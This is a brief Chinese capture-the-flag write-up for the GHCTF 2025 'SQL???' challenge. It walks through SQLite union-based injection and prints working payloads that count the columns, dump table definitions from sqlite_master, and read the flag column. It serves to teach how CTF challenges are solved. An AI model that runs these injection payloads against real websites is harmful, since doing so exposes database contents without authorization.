[GHCTF 2025]SQL???

打开题目在线环境：

先尝试注入：
   id=1;show databases;
  

发现报错，后来看了wp才知道这个题目是SQLite注入。
我看的是这个师傅的wp:
   https://blog.csdn.net/2401_86190146/article/details/146164505?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522b2e94c28c4b9713fffb8456c983de1b3%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=b2e94c28c4b9713fffb8456c983de1b3&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduend~default-1-146164505-null-null.142v102pc_search_result_base9&utm_term=%5BGHCTF%202025%5DSQL&spm=1018.2226.3001.4187
  1.先判定有几列

1. ? id=1 order by 6 #

复制代码

到第六列时：

2.爆出来表名

1. /?id=1 union select 1,2,3,4,group_concat(sql) from sqlite_master

复制代码

所以我们要找的就是flag表里的flag列
直接payload：

1. /?id=1 union select 1,2,3,4,flag from flag

复制代码

在这里插入图片形貌

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

继续阅读请点击广告